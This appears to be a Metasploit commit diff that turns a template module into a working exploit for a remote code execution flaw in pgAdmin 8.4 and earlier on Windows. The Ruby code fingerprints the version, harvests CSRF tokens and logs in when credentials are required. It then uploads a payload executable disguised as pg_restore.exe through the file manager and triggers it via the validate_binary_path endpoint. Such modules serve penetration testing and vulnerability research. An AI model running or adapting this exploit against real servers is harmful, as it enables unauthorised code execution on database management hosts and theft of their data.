Github release

igomeow · igomeow · commit 7e9f52dd0b36 · 2024-08-26T23:02:53.000+02:00
diff --git a/documentation/modules/exploit/windows/http/pgadmin_binary_path_api.md b/documentation/modules/exploit/windows/http/pgadmin_binary_path_api.md
@@ -1,7 +1,12 @@
-*## Vulnerable Application
-The pgAdmin versions up to 8.4 are vulnerable to a Remote Code Execution (RCE) flaw through the validate binary path API. This vulnerability allows attackers to run arbitrary code on the server hosting pgAdmin, which poses a significant threat to the integrity of the database management system and the security of its underlying data.
-
-The exploit can be executed in both authenticated and unauthenticated scenarios. When valid credentials are available, Metasploit can log in to pgAdmin, upload a malicious payload using the file management plugin, and then execute it via the validate_binary_path endpoint. This vulnerability is specific to Windows targets. If authentication is not required by the application, Metasploit can directly upload and trigger the payload through the validate_binary_path endpoint.
+## Vulnerable Application
+The pgAdmin versions up to 8.4 are vulnerable to a Remote Code Execution (RCE) flaw through the validate binary path API.
+This vulnerability allows attackers to run arbitrary code on the server hosting pgAdmin, which poses a significant
+threat to the integrity of the database management system and the security of its underlying data.
+
+The exploit can be executed in both authenticated and unauthenticated scenarios. When valid credentials are available,
+Metasploit can log in to pgAdmin, upload a malicious payload using the file management plugin, and then execute it via
+the validate_binary_path endpoint. This vulnerability is specific to Windows targets. If authentication is not required
+by the application, Metasploit can directly upload and trigger the payload through the validate_binary_path endpoint.
 
 ## Verification Steps
 
diff --git a/modules/exploits/windows/http/pgadmin_binary_path_api.rb b/modules/exploits/windows/http/pgadmin_binary_path_api.rb
@@ -4,33 +4,30 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking 
+  Rank = ExcellentRanking
 
-  #
-  # This exploit affects a webapp, so we need to import HTTP Client
-  # to easily interact with it.
-  #
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-
- 
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'pgAdmin Binary Path API RCE',
         'Description' => %q{
-          pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) 
-          vulnerability through the validate binary path API. This vulnerability 
-          allows attackers to execute arbitrary code on the server hosting PGAdmin, 
-          posing a severe risk to the database management system's integrity and the security of the underlying data. 
+          pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)
+          vulnerability through the validate binary path API. This vulnerability
+          allows attackers to execute arbitrary code on the server hosting PGAdmin,
+          posing a severe risk to the database management system's integrity and the security of the underlying data.
 
-          Tested on pgAdmin 8.4 on Windows 10.
+          Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'M.Selim Karahan', # metasploit module
+          'Mustafa Mutlu', # lab prep. and QA
           'Ayoub Mokhtar' # vulnerability discovery and write up
         ],
         'References' => [
@@ -45,7 +42,6 @@ def initialize(info = {})
         ],
         'DisclosureDate' => '2024-03-28',
         'DefaultTarget' => 0,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
           'Reliability' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ],
@@ -55,107 +51,178 @@ def initialize(info = {})
     )
     register_options(
       [
-        Opt::RPORT(80),
-        OptString.new('USERNAME', [ false, 'User to login with', 'admin']),
-        OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
-        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
+        Opt::RPORT(8000),
+        OptString.new('USERNAME', [ false, 'User to login with', '']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/'])
       ]
     )
   end
 
-  #
-  # The sample exploit checks the index page to verify the version number is exploitable
-  # we use a regex for the version number
-  #
   def check
-    # only catch the response if we're going to use it, in this case we do for the version
-    # detection.
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'method' => 'GET'
-    )
-    # gracefully handle if res comes back as nil, since we're not guaranteed a response
-    # also handle if we get an unexpected HTTP response code
-    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
-    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200
+    version = get_version
+    return CheckCode::Unknown('Unable to determine the target version') unless version
+    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')
+
+    CheckCode::Vulnerable("pgAdmin version #{version} is affected")
+  end
 
-    # here we're looking through html for the version string, similar to:
-    # Version 1.2
-    %r{Version: (?<version>\d{1,2}\.\d{1,2})</td>} =~ res.body
+  def set_csrf_token_from_login_page(res)
+    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
+      @csrf_token = Regexp.last_match(1)
+    # at some point between v7.0 and 7.7 the token format changed
+    elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)
+      @csrf_token = element['value']
+    end
+  end
+
+  def set_csrf_token_from_config(res)
+    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
+      @csrf_token = Regexp.last_match(1)
+      # at some point between v7.0 and 7.7 the token format changed
+      # pgAdmin['csrf_token'] =
+    else
+      @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first
+    end
+  end
+
+  def auth_required?
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
+    if res&.code == 302 && res.headers['Location']['login']
+      true
+    elsif res&.code == 302 && res.headers['Location']['browser']
+      false
+    end
+  end
 
-    if version && Rex::Version.new(version) <= Rex::Version.new('1.3')
-      CheckCode::Appears("Version Detected: #{version}")
+  def get_version
+    if auth_required?
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+    else
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)
     end
+    html_document = res.get_html_document
+    return unless html_document.xpath('//title').text == 'pgAdmin 4'
+
+    # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,
+    # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27
+    versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }
+    return unless versioned_link
+
+    Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")
+  end
+
+  def csrf_token
+    return @csrf_token if @csrf_token
 
-    CheckCode::Safe
+    if auth_required?
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+      set_csrf_token_from_login_page(res)
+    else
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)
+      set_csrf_token_from_config(res)
+    end
+    fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
+    @csrf_token
   end
 
-  #
-  # The exploit method attempts a login, then attempts to throw a command execution
-  # at a web page through a POST variable
-  #
   def exploit
-    # attempt a login. In this case we show basic auth, and a POST to a fake username/password
-    # simply to show how both are done
-    vprint_status('Attempting login')
-    # since we will check res to see if auth was a success, make sure to capture the return
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'login.php'),
+    if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?)
+      fail_with(Failure::BadConfig, 'Application requires authentication, provide credentials!')
+    end
+
+    if auth_required?
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'authenticate/login'),
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'vars_post' => {
+          'csrf_token' => csrf_token,
+          'email' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          'language' => 'en',
+          'internal_button' => 'Login'
+        }
+      })
+
+      unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')
+        fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')
+      end
+
+      print_status('Successfully authenticated to pgAdmin')
+    end
+
+    file_name = 'pg_restore.exe'
+    file_manager_upload_and_trigger(file_name, generate_payload_exe)
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  # file manager code is copied from pgadmin_session_deserialization module
+
+  def file_manager_init
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'file_manager/init'),
       'method' => 'POST',
-      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-      # automatically handle cookies with keep_cookies.  Alternatively use cookie = res.get_cookies and 'cookie' => cookie,
       'keep_cookies' => true,
-      'vars_post' => {
-        'username' => datastore['USERNAME'],
-        'password' => datastore['PASSWORD']
-      },
-      'vars_get' => {
-        'example' => 'example'
-      }
+      'ctype' => 'application/json',
+      'headers' => { 'X-pgA-CSRFToken' => csrf_token },
+      'data' => {
+        'dialog_type' => 'storage_dialog',
+        'supported_types' => ['sql', 'csv', 'json', '*'],
+        'dialog_title' => 'Storage Manager'
+      }.to_json
+    })
+
+    unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir'))
+      fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder')
+    end
+
+    return trans_id, home_folder
+  end
+
+  def file_manager_upload_and_trigger(file_path, file_contents)
+    trans_id, home_folder = file_manager_init
+
+    form = Rex::MIME::Message.new
+    form.add_part(
+      file_contents,
+      'application/octet-stream',
+      'binary',
+      "form-data; name=\"newfile\"; filename=\"#{file_path}\""
     )
+    form.add_part('add', nil, nil, 'form-data; name="mode"')
+    form.add_part(home_folder, nil, nil, 'form-data; name="currentpath"')
+    form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form.bound}",
+      'headers' => { 'X-pgA-CSRFToken' => csrf_token },
+      'data' => form.to_s
+    })
+    unless res&.code == 200 && res.get_json_document['success'] == 1
+      fail_with(Failure::UnexpectedReply, 'Failed to upload file contents')
+    end
 
-    # a valid login will give us a 301 redirect to /home.html so check that.
-    # ALWAYS assume res could be nil and check it first!!!!!
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
-    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 301
+    upload_path = res.get_json_document.dig('data', 'result', 'Name')
+    register_file_for_cleanup(upload_path)
+    print_status("Payload uploaded to: #{upload_path}")
 
-    # we don't care what the response is, so don't bother saving it from send_request_cgi
-    # datastore['HttpClientTimeout'] ONLY IF we need a longer HTTP timeout
-    vprint_status('Attempting exploit')
     send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'command.html'),
+      'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'),
       'method' => 'POST',
-      'vars_post' =>
-      {
-        'cmd_str' => payload.encoded
-      }
-    }, datastore['HttpClientTimeout'])
-
-    # send_request_raw is used when we need to break away from the HTTP protocol in some way for the exploit to work
-    send_request_raw({
-      'method' => 'DESCRIBE',
-      'proto' => 'RTSP',
-      'version' => '1.0',
-      'uri' => '/' + ('../' * 560) + "\xcc\xcc\x90\x90" + '.smi'
-    }, datastore['HttpClientTimeout'])
-
-    # example of sending a MIME message
-    data = Rex::MIME::Message.new
-    # https://github.com/rapid7/rex-mime/blob/master/lib/rex/mime/message.rb
-    file_contents = payload.encoded
-    data.add_part(file_contents, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"uploaded.bin\"")
-    data.add_part('example', nil, nil, "form-data; name=\"_wpnonce\"")
-
-    post_data = data.to_s
-
-    res = send_request_cgi(
-      'method'  => 'POST',
-      'uri'     => normalize_uri(target_uri.path, 'async-upload.php'),
-      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
-      'data'    => post_data,
-      'cookie'  => cookie
-    )
-  rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'headers' => { 'X-pgA-CSRFToken' => csrf_token },
+      'data' => {
+        'utility_path' => upload_path[0..upload_path.size - 16]
+      }.to_json
+    })
+
+    true
   end
+
 end
